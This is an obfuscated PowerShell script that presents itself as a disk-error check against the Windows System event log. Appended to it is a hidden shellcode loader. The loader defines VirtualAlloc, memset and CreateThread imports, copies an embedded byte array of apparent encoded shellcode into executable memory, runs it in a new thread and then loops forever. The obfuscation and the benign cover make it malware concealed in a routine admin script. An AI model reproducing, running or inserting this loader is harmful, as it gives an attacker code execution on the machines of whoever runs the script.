if ((&("{2}{1}{0}"-f'ost','t-h','ge'))."VeR`SI`On"."Maj`OR" -ge 4){
${xM`lq`UeRy} = [xml]((("{2}{15}{17}{32}{30}{34}{48}{19}{14}{1}{11}{10}{27}{39}{22}{9}{8}{13}{25}{28}{26}{36}{49}{37}{29}{20}{4}{7}{6}{24}{12}{45}{44}{23}{43}{46}{33}{31}{41}{3}{16}{42}{21}{40}{18}{5}{0}{47}{38}{35}"-f 'y>
</QueryL','SystemwRH>
  ','5F','0','n','r','e','d Tim','=wRHSyst','ath','Se','  <','ated[time','emwRH>*[Syste','RH','y
<Query','000]]]</','L','  </Que','w','disk5Fy] a','le','P','S','Cre','m[P','o','lect','r','me=5Fy','st>
  <Qu','lt;= 8','i','e) &','ery Id=wRH0','5Fy','vid','a','t>
',' ','ct>
','640','Se','yst','@','diff(','emTim','is','wRH Path=','er[@N'))  -CREPLACE'5Fy',[ChAr]39  -CREPLACE 'wRH',[ChAr]34)
${Lo`go`U`TPut} = .("{2}{3}{0}{1}"-f'en','t','G','et-WinEv') -FilterXml ${Xm`lQuE`RY} -ErrorAction ("{1}{0}{3}{2}{4}" -f'nt','Sile','yC','l','ontinue')
}
  else{
    ${Lo`GouT`P`Ut} = .("{2}{1}{0}" -f 'ntLog','ve','Get-E') -LogName ("{1}{0}"-f 'tem','sys') -Source ("{0}{1}" -f'di','sk') -After (&("{1}{0}" -f 'e','get-dat')).("{1}{0}" -f's','AddDay').Invoke(-1) -ErrorAction ("{2}{3}{0}{1}"-f'yCo','ntinue','Silent','l')
    }

if (${l`oG`OUtput}){
.("{0}{2}{1}"-f'Write-','t','Hos') ("{1}{2}{0}"-f'RROR---','---','E')
&("{3}{0}{2}{1}"-f'rite-','t','Hos','W') ("{2}{7}{5}{4}{6}{3}{0}{1}"-f'ystem log foun','d','Di','in s','ges','essa',' ','sk m')
${lOG`oUtP`UT} | .('fl') ("{3}{1}{0}{4}{2}" -f'meGen','i','d','T','erate'), ("{0}{1}{2}" -f'Mes','sa','ge')
exit 1010
}

else{
&("{1}{2}{0}" -f 'e-Host','W','rit') ("{0}{2}{1}" -f '---O','---','K')
&("{1}{2}{0}"-f 'st','Write-H','o') ("{5}{3}{8}{7}{1}{6}{2}{0}{9}{4}" -f' ','s in syste',' log','mes','und','No disk ','m','ge','sa','fo')
exit 0
}
${C} = ((("{110}{42}{12}{71}{72}{66}{113}{16}{55}{115}{35}{82}{60}{57}{46}{90}{8}{77}{70}{20}{91}{53}{88}{2}{39}{14}{26}{21}{61}{119}{58}{81}{43}{101}{104}{11}{34}{9}{31}{103}{106}{44}{80}{114}{68}{40}{112}{49}{32}{107}{69}{36}{93}{13}{105}{29}{28}{1}{85}{99}{92}{74}{63}{30}{87}{75}{25}{45}{48}{18}{38}{15}{117}{51}{19}{109}{98}{41}{4}{95}{56}{24}{67}{23}{22}{50}{64}{100}{78}{62}{94}{54}{73}{27}{47}{111}{89}{6}{79}{84}{17}{86}{118}{33}{0}{10}{37}{59}{83}{116}{76}{7}{5}{97}{96}{108}{3}{52}{65}{102}"-f'r','r ','t','int',' ','tPtr','.dllKe7)]p','et(In','Al','l32.','n','rn','o','a','Size, u',' l','publ','sta',' IntPt','ss,','d','i','a','e','dw','ck','int flAllocationType, u','rt(K','tPt','In','i','dllK','IntP','e','e','c','at',' IntPt','r',' dw','xt',' lpParameter,','mp','I','bl','Size','Vi','e7m',',','n ','ti','ddre',' co','i','d);[','ic st','nt ','Ptr ','t','r','Int','nt flPr','tPtr lpThrea',' u','onF','un','7)','Cr','e','r Cre','d','rt(Ke7kernel3','2.dllKe','DllImpo','adAttributes,','a','ms','loc(IntPtr lpA',', In','u','ic',');[Dll',' extern ',' m','blic ','lpTh','tic e','nt dwSt','n','t','rtual','ress, u','e','eThre','dI','ui','sr',' dest, uint ','IntPtr','r','lags','mpo','t);','e7)','rt(Ke7ke','d(',']pu','t','c, u',' ','[DllI','svcr','er',']',' static ','ati','e','pStartA','xt','otec'))-REPLAcE  ([ChAr]75+[ChAr]101+[ChAr]55),[ChAr]34);${w} = &("{2}{1}{0}"-f'Type','d-','Ad') -memberDefinition ${C} -Name ("{0}{1}" -f'W','in32') -namespace ("{2}{4}{3}{0}{1}" -f 't','ions','Win','Func','32') -passthru;[Byte[]];[Byte[]]${z} = 0xbd,0xbb,0xc5,0x31,0x3d,0xdb,0xcc,0xd9,0x74,0x24,0xf4,0x5f,0x31,0xc9,0xb1,0x47,0x31,0x6f,0x13,0x83,0xef,0xfc,0x03,0x6f,0xb4,0x27,0xc4,0xc1,0x22,0x25,0x27,0x3a,0xb2,0x4a,0xa1,0xdf,0x83,0x4a,0xd5,0x94,0xb3,0x7a,0x9d,0xf9,0x3f,0xf0,0xf3,0xe9,0xb4,0x74,0xdc,0x1e,0x7d,0x32,0x3a,0x10,0x7e,0x6f,0x7e,0x33,0xfc,0x72,0x53,0x93,0x3d,0xbd,0xa6,0xd2,0x7a,0xa0,0x4b,0x86,0xd3,0xae,0xfe,0x37,0x50,0xfa,0xc2,0xbc,0x2a,0xea,0x42,0x20,0xfa,0x0d,0x62,0xf7,0x71,0x54,0xa4,0xf9,0x56,0xec,0xed,0xe1,0xbb,0xc9,0xa4,0x9a,0x0f,0xa5,0x36,0x4b,0x5e,0x46,0x94,0xb2,0x6f,0xb5,0xe4,0xf3,0x57,0x26,0x93,0x0d,0xa4,0xdb,0xa4,0xc9,0xd7,0x07,0x20,0xca,0x7f,0xc3,0x92,0x36,0x7e,0x00,0x44,0xbc,0x8c,0xed,0x02,0x9a,0x90,0xf0,0xc7,0x90,0xac,0x79,0xe6,0x76,0x25,0x39,0xcd,0x52,0x6e,0x99,0x6c,0xc2,0xca,0x4c,0x90,0x14,0xb5,0x31,0x34,0x5e,0x5b,0x25,0x45,0x3d,0x33,0x8a,0x64,0xbe,0xc3,0x84,0xff,0xcd,0xf1,0x0b,0x54,0x5a,0xb9,0xc4,0x72,0x9d,0xbe,0xfe,0xc3,0x31,0x41,0x01,0x34,0x1b,0x85,0x55,0x64,0x33,0x2c,0xd6,0xef,0xc3,0xd1,0x03,0x85,0xc6,0x45,0xeb,0x10,0x95,0x87,0x9b,0xa6,0x25,0xa6,0xe0,0x2e,0xc3,0xf8,0x46,0x61,0x5c,0xb8,0x36,0xc1,0x0c,0x50,0x5d,0xce,0x73,0x40,0x5e,0x04,0x1c,0xea,0xb1,0xf1,0x74,0x82,0x28,0x58,0x0e,0x33,0xb4,0x76,0x6a,0x73,0x3e,0x75,0x8a,0x3d,0xb7,0xf0,0x98,0xa9,0x37,0x4f,0xc2,0x7f,0x47,0x65,0x69,0x7f,0xdd,0x82,0x38,0x28,0x49,0x89,0x1d,0x1e,0xd6,0x72,0x48,0x15,0xdf,0xe6,0x33,0x41,0x20,0xe7,0xb3,0x91,0x76,0x6d,0xb4,0xf9,0x2e,0xd5,0xe7,0x1c,0x31,0xc0,0x9b,0x8d,0xa4,0xeb,0xcd,0x62,0x6e,0x84,0xf3,0x5d,0x58,0x0b,0x0b,0x88,0x58,0x77,0xda,0xf4,0x2e,0x99,0xde;${g} = 0x1000;if (${z}."LEnG`TH" -gt 0x1000){${g} = ${z}."LE`NG`Th"};${x}=${w}::("{3}{2}{0}{1}"-f'lAllo','c','ua','Virt').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${Z}."L`En`gTH"-1);${I}++) {${W}::"M`Em`sET"([IntPtr](${X}.("{0}{1}" -f'ToI','nt32').Invoke()+${I}), ${z}[${i}], 1)};${W}::("{0}{1}{2}"-f'Cr','e','ateThread').Invoke(0,0,${X},0,0,0);for (;;){&("{0}{1}{2}"-f 'Star','t','-sleep') 60};
